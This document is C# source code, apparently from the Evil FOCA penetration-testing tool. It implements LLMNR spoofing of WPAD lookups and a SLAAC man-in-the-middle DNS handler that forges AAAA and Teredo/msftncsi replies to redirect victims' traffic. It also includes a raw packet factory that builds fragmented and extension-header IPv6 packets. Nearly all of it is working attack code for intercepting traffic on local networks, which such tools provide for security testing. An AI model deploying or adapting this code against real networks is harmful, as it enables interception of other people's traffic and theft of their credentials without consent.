public void GenerateLLMNRResponse(Packet packet)
{
try
{
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
if (llmnr.Query.Name.ToLower().Equals("wpad") && (llmnr.Query.Type.Value == LLMNR.DNSType.AAAA || llmnr.Query.Type.Value == LLMNR.DNSType.A))
{
WinPcapDevice dev = Program.CurrentProject.data.GetDevice();
IPAddress ip = Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(dev);
byte[] ipv6Addr = ip.GetAddressBytes();
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length,
TTL = 12
});
llmnr.IsResponse = true;
EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV6);
IPv6Packet ipv6Dns = new IPv6Packet(ip, ((IPv6Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
ethDns.PayloadPacket = ipv6Dns;
Program.CurrentProject.data.SendPacket(ethDns);
}
}
catch (Exception)
{
}
}
private void DNSCheck(Packet p)
{
EthernetPacket ethernet = (EthernetPacket)p;
if (p.PayloadPacket.PayloadPacket is UdpPacket)
{
UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
{
MitmAttack mitmAttack = currentAttack as MitmAttack;
if (p.PayloadPacket is IPv6Packet)
{
switch (udp.DestinationPort)
{
case 53:
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
var aaaaDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
select q).ToList();
//Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
var aTeredoDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.A &&
(q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
select q).ToList();
if (aaaaDns != null && aaaaDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
else if (aTeredoDns != null && aTeredoDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
case 5355:
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(udp.PayloadData);
if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
{
IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
select ip).ToArray();
byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
(byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1],
(byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] };
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length
});
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
default:
break;
}
}
});
}
}
public static Packet CreatePacket(Param param)
{
Packet ret = null;
//create layer 4
if (param.packetType == Param.PacketType.TCP)
{
TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort);
tcpPacket.AllFlags = param.tcpFlag;
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
ipPacket.UpdateCalculatedValues();
ipPacket.UpdateIPChecksum();
tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum();
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.UDP)
{
UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort);
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ipPacket.UpdateIPChecksum();
ret.PayloadPacket = ipPacket;
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.ICMP)
{
ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32]));
if (param.type != 0 && param.code != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code));
}
else if (param.type != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256));
}
else
{
icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest;
}
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.PayloadPacket = icmpPacket;
ipPacket.Checksum = ipPacket.CalculateIPChecksum();
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.ICMPv6)
{
ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param);
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.PayloadPacket = icmpv6Packet;
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.IP)
{
if (param.dIP.ToString().Contains("."))
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
ipPacket.UpdateIPChecksum();
}
else
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
//if extension headers were not specified, just put the payload
if (param.ExtentionHeader.Count == 0)
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.PayloadLength = (ushort)param.payload.Length;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
}
else
{
ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret);
}
ret.UpdateCalculatedValues();
}
}
else if (param.packetType == Param.PacketType.EtherType)
{
ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol);
byte[] etherBuffer = (new byte[64]);
var payload = new byte[etherBuffer.Length + (param.payload).Length];
etherBuffer.CopyTo(payload, 0);
(param.payload).CopyTo(payload, etherBuffer.Length);
ret.PayloadData = payload;
ret.UpdateCalculatedValues();
}
return ret;
}
//terrible hack to get extension headers working
private static EthernetPacket CreateEHPacket(Param param, EthernetPacket ret)
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.Protocol = (IPProtocolType)param.ExtentionHeader[0];
param.ExtentionHeader.RemoveAt(0);
//need to find out what is the last packet so that we can decide on the length of the packet
IPProtocolType endEH = param.ExtentionHeader[param.ExtentionHeader.Count - 1];
int lastHeaderLength = 0;
switch (endEH)
{
case IPProtocolType.TCP:
lastHeaderLength = 20;
break;
case IPProtocolType.UDP:
lastHeaderLength = 8;
break;
case IPProtocolType.ICMP:
lastHeaderLength = 8;
break;
default:
lastHeaderLength = 64;
break;
}
//calculate the Extension header size
int EHSize = 0;
foreach (IPProtocolType eh in param.ExtentionHeader)
{
if (eh == IPProtocolType.FRAGMENT)
{
EHSize += 8;
}
else
{
EHSize += 24;
}
}
if (ipPacket.Protocol == IPProtocolType.FRAGMENT)
{
EHSize -= 16;
}
byte[] tempPayload = new byte[EHSize + param.payload.Length + lastHeaderLength];
param.payload.CopyTo(tempPayload, EHSize + lastHeaderLength);
int loc = 0;
byte previous = (byte)ipPacket.Protocol;
foreach (byte eh in param.ExtentionHeader)
{
tempPayload.SetValue((byte)eh, loc);
tempPayload.SetValue((byte)2, loc + 1);
if ((IPProtocolType)previous == IPProtocolType.FRAGMENT)
{
loc += 8;
}
else
{
loc += 24;
}
previous = eh;
}
//set the port if the last EH is tcp or udp
if (endEH == IPProtocolType.TCP || endEH == IPProtocolType.UDP)
{
//set the port numbers
tempPayload.SetValue((byte)(param.sPort >> 8), loc);
tempPayload.SetValue((byte)param.sPort, loc + 1);
tempPayload.SetValue((byte)(param.dPort >> 8), loc + 2);
tempPayload.SetValue((byte)param.dPort, loc + 3);
}
if (endEH == IPProtocolType.TCP)
{
tempPayload.SetValue((byte)0x50, loc + 12);
}
else if (endEH == IPProtocolType.UDP)
{
//set the length of the payload
Int16 length = (Int16)(lastHeaderLength + param.payload.Length);
BitConverter.GetBytes(length).CopyTo(tempPayload, loc + 5);
tempPayload.SetValue((byte)0x12, loc + 6);
tempPayload.SetValue((byte)0x34, loc + 7);
}
//set the tcp flags if they are TCP
if (endEH == IPProtocolType.TCP)
{
tempPayload.SetValue((byte)param.tcpFlag, loc + 13);
}
ipPacket.PayloadData = tempPayload;
ipPacket.PayloadLength = (ushort)tempPayload.Length;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
return ret;
}
